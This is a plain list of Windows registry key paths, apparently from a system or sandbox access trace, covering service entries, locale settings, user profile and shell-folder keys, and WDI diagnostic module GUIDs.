HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_USERS\S-1-5-19
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-19\Environment
HKEY_USERS\S-1-5-19\Volatile Environment
HKEY_USERS\S-1-5-19\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
